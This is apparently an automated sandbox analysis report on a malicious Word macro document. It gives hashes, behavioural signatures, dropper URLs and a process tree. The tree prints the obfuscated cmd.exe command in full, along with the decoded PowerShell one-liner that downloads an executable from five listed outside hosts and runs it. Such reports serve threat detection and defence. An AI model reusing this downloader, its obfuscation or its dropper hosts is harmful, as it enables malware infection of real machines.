Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
-
submitted
23-05-2024 00:26
General
-
Target
620a53fb175e89ffa9d3bb418de2bf76JaffaCakes118.doc
-
Size
209KB
-
MD5
620a53fb175e89ffa9d3bb418de2bf76
-
SHA1
0aaee79492b8ab7a5a7a0fe6a7d8b5ec1891bd07
-
SHA256
21ac00f9881bdec79e953f5b17bfc41a39b74f7f584c228a88783fdbf6b2f9ce
-
SHA512
ab99b5555f92ff4b6f9144c878499846740d37ecf1842bdbd88ae6e5158a96fd79e563abb05eb75621666bc254b72c441a670388a9b280fd1b8276b2de8b7896
-
SSDEEP
3072:q/EEAUFdf/OkQf4I6iNKDzaJFUKc0UTE7yZRUV7RJeOzi8+:HEAgd7k4IZEDzYUTE7yZRVUi8+
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://mhnew.enabledware.com/wp-content/upgrade/1Qvuku8g
exe.dropper
http://maquinadefalaringles.info/Us1uHMn
exe.dropper
http://5072610.ru/YjNBdzFKT9
exe.dropper
http://bietthunghiduong24h.info/oVQCPSWV
exe.dropper
http://ustpharm89.net/sYr7xBoXx
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\620a53fb175e89ffa9d3bb418de2bf76JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\cmd.exec:\dvnkqbp\rvrjvzf\inivzv\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set cX9o=T,ov7BUHrO'1=z@x3%s90ny):dVFhXmkI\i$Q+ .{up;wSc(Y8/NjaEfG4Ce}t2b5A~lDLW-M6PKgq&&for %e in (42;2;44;17;74;6;5;69;32;58;24;66;64;1;11;17;8;17;45;54;45;45;32;9;51;51;65;72;54;24;66;71;57;1;11;17;28;17;0;54;72;74;24;66;71;16;1;11;17;67;67;38;35;61;31;55;25;55;34;12;10;18;77;63;67;13;67;44;10;43;35;55;31;18;28;55;13;63;12;21;59;44;71;2;63;52;59;46;61;38;51;59;61;39;70;59;63;58;67;34;59;21;61;43;35;18;8;61;25;52;61;12;10;28;61;61;42;24;50;50;30;28;21;59;44;39;59;21;53;63;67;59;25;44;53;8;59;39;46;2;30;50;44;42;71;46;2;21;61;59;21;61;50;41;42;76;8;53;25;59;50;11;36;3;41;31;41;49;76;14;28;61;61;42;24;50;50;30;53;77;41;34;21;53;25;59;55;53;67;53;8;34;21;76;67;59;18;39;34;21;55;2;50;6;18;11;41;7;72;21;14;28;61;61;42;24;50;50;64;20;4;62;73;11;20;39;8;41;50;48;52;51;5;25;13;27;75;0;19;14;28;61;61;42;24;50;50;63;34;59;61;61;28;41;21;76;28;34;25;41;2;21;76;62;57;28;39;34;21;55;2;50;2;26;36;58;74;45;70;26;14;28;61;61;42;24;50;50;41;18;61;42;28;53;8;30;49;19;39;21;59;61;50;18;48;8;4;15;5;2;29;15;10;39;45;42;67;34;61;47;10;14;10;23;43;35;44;53;41;13;25;12;10;61;52;3;61;34;21;10;43;35;34;77;2;21;30;25;38;12;38;10;16;16;57;10;43;35;13;61;13;18;2;12;10;18;21;18;41;13;30;67;10;43;35;55;34;67;31;63;12;35;59;21;3;24;61;59;30;42;37;10;33;10;37;35;34;77;2;21;30;25;37;10;39;59;15;59;10;43;55;2;8;59;53;46;28;47;35;2;30;34;30;34;13;18;38;34;21;38;35;18;8;61;25;52;61;23;40;61;8;22;40;35;55;31;18;28;55;13;63;39;68;2;44;21;67;2;53;25;27;34;67;59;47;35;2;30;34;30;34;13;18;1;38;35;55;34;67;31;63;23;43;35;63;30;42;25;2;2;42;12;10;52;44;21;61;21;55;10;43;32;55;38;47;47;56;59;61;71;32;61;59;30;38;35;55;34;67;31;63;23;39;67;59;21;76;61;28;38;71;76;59;38;57;20;20;20;20;23;38;40;32;21;3;2;31;59;71;32;61;59;30;38;35;55;34;67;31;63;43;35;28;46;18;13;3;67;12;10;63;31;67;55;8;10;43;63;8;59;53;31;43;60;60;46;53;61;46;28;40;60;60;35;44;13;46;53;18;34;42;12;10;67;25;55;34;34;10;43;79)do set Y9c=!Y9c!!cX9o:~%e,1!&&if %e==79 echo !Y9c:~-610!|cmd.exe"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeCmD /V/C"set cX9o=T,ov7BUHrO'1=z@x3%s90ny):dVFhXmkI\i$Q+ .{up;wSc(Y8/NjaEfG4Ce}t2b5A~lDLW-M6PKgq&&for %e in (42;2;44;17;74;6;5;69;32;58;24;66;64;1;11;17;8;17;45;54;45;45;32;9;51;51;65;72;54;24;66;71;57;1;11;17;28;17;0;54;72;74;24;66;71;16;1;11;17;67;67;38;35;61;31;55;25;55;34;12;10;18;77;63;67;13;67;44;10;43;35;55;31;18;28;55;13;63;12;21;59;44;71;2;63;52;59;46;61;38;51;59;61;39;70;59;63;58;67;34;59;21;61;43;35;18;8;61;25;52;61;12;10;28;61;61;42;24;50;50;30;28;21;59;44;39;59;21;53;63;67;59;25;44;53;8;59;39;46;2;30;50;44;42;71;46;2;21;61;59;21;61;50;41;42;76;8;53;25;59;50;11;36;3;41;31;41;49;76;14;28;61;61;42;24;50;50;30;53;77;41;34;21;53;25;59;55;53;67;53;8;34;21;76;67;59;18;39;34;21;55;2;50;6;18;11;41;7;72;21;14;28;61;61;42;24;50;50;64;20;4;62;73;11;20;39;8;41;50;48;52;51;5;25;13;27;75;0;19;14;28;61;61;42;24;50;50;63;34;59;61;61;28;41;21;76;28;34;25;41;2;21;76;62;57;28;39;34;21;55;2;50;2;26;36;58;74;45;70;26;14;28;61;61;42;24;50;50;41;18;61;42;28;53;8;30;49;19;39;21;59;61;50;18;48;8;4;15;5;2;29;15;10;39;45;42;67;34;61;47;10;14;10;23;43;35;44;53;41;13;25;12;10;61;52;3;61;34;21;10;43;35;34;77;2;21;30;25;38;12;38;10;16;16;57;10;43;35;13;61;13;18;2;12;10;18;21;18;41;13;30;67;10;43;35;55;34;67;31;63;12;35;59;21;3;24;61;59;30;42;37;10;33;10;37;35;34;77;2;21;30;25;37;10;39;59;15;59;10;43;55;2;8;59;53;46;28;47;35;2;30;34;30;34;13;18;38;34;21;38;35;18;8;61;25;52;61;23;40;61;8;22;40;35;55;31;18;28;55;13;63;39;68;2;44;21;67;2;53;25;27;34;67;59;47;35;2;30;34;30;34;13;18;1;38;35;55;34;67;31;63;23;43;35;63;30;42;25;2;2;42;12;10;52;44;21;61;21;55;10;43;32;55;38;47;47;56;59;61;71;32;61;59;30;38;35;55;34;67;31;63;23;39;67;59;21;76;61;28;38;71;76;59;38;57;20;20;20;20;23;38;40;32;21;3;2;31;59;71;32;61;59;30;38;35;55;34;67;31;63;43;35;28;46;18;13;3;67;12;10;63;31;67;55;8;10;43;63;8;59;53;31;43;60;60;46;53;61;46;28;40;60;60;35;44;13;46;53;18;34;42;12;10;67;25;55;34;34;10;43;79)do set Y9c=!Y9c!!cX9o:~%e,1!&&if %e==79 echo !Y9c:~-610!|cmd.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $tkfdfi='sqblzlw';$fkshfzb=new-object Net.WebClient;$srtdjt='http://mhnew.enabledware.com/wp-content/upgrade/1Qvuku8g@http://maquinadefalaringles.info/Us1uHMn@http://5072610.ru/YjNBdzFKT9@http://bietthunghiduong24h.info/oVQCPSWV@http://ustpharm89.net/sYr7xBoXx'.Split('@');$wauzd='tjvtin';$iqonmd = '334';$ztzso='snsuzml';$filkb=$env:temp+'\'+$iqonmd+'.exe';foreach($omimizs in $srtdjt){try{$fkshfzb.DownloadFile($omimizs, $filkb);$bmpdoop='jwntnf';If ((Get-Item $filkb).length -ge 40000) {Invoke-Item $filkb;$hcszvl='bklfr';break;}}catch{}}$wzcasip='ldfii';"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $tkfdfi='sqblzlw';$fkshfzb=new-object Net.WebClient;$srtdjt='http://mhnew.enabledware.com/wp-content/upgrade/1Qvuku8g@http://maquinadefalaringles.info/Us1uHMn@http://5072610.ru/YjNBdzFKT9@http://bietthunghiduong24h.info/oVQCPSWV@http://ustpharm89.net/sYr7xBoXx'.Split('@');$wauzd='tjvtin';$iqonmd = '334';$ztzso='snsuzml';$filkb=$env:temp+'\'+$iqonmd+'.exe';foreach($omimizs in $srtdjt){try{$fkshfzb.DownloadFile($omimizs, $filkb);$bmpdoop='jwntnf';If ((Get-Item $filkb).length -ge 40000) {Invoke-Item $filkb;$hcszvl='bklfr';break;}}catch{}}$wzcasip='ldfii';5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
20KB
MD5696a7e7c02d59cb4fcff6fdce6944b6d
SHA153ac273eab71cc3029e6f173cda64cb1a0a6a21c
SHA2563e82878740b8b30ba707aa8abb55ed8b632c97dfa5026c8efbedd26cdd8f93d9
SHA512cbfc094c6b59e62f036631a01aff6acbefa5f4e25ba8f808acbaf71874b49b51a6030edf96728798404c411e0ecde7e17a964d10454673352e4b8856e42443da
-
memory/2240-51-0x0000000006700000-0x0000000006800000-memory.dmpFilesize
1024KB
-
memory/2240-70-0x0000000006700000-0x0000000006800000-memory.dmpFilesize
1024KB
-
memory/2240-17-0x0000000006700000-0x0000000006800000-memory.dmpFilesize
1024KB
-
memory/2240-27-0x0000000006700000-0x0000000006800000-memory.dmpFilesize
1024KB
-
memory/2240-87-0x0000000006700000-0x0000000006800000-memory.dmpFilesize
1024KB
-
memory/2240-60-0x0000000006700000-0x0000000006800000-memory.dmpFilesize
1024KB
-
memory/2240-2-0x0000000070D0D000-0x0000000070D18000-memory.dmpFilesize
44KB
-
memory/2240-0-0x000000002F051000-0x000000002F052000-memory.dmpFilesize
4KB
-
memory/2240-69-0x0000000006700000-0x0000000006800000-memory.dmpFilesize
1024KB
-
memory/2240-95-0x0000000070D0D000-0x0000000070D18000-memory.dmpFilesize
44KB
-
memory/2240-96-0x0000000006700000-0x0000000006800000-memory.dmpFilesize
1024KB
-
memory/2240-98-0x0000000006900000-0x0000000006A00000-memory.dmpFilesize
1024KB
-
memory/2240-99-0x0000000006700000-0x0000000006800000-memory.dmpFilesize
1024KB
-
memory/2240-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2240-121-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2240-122-0x0000000070D0D000-0x0000000070D18000-memory.dmpFilesize
44KB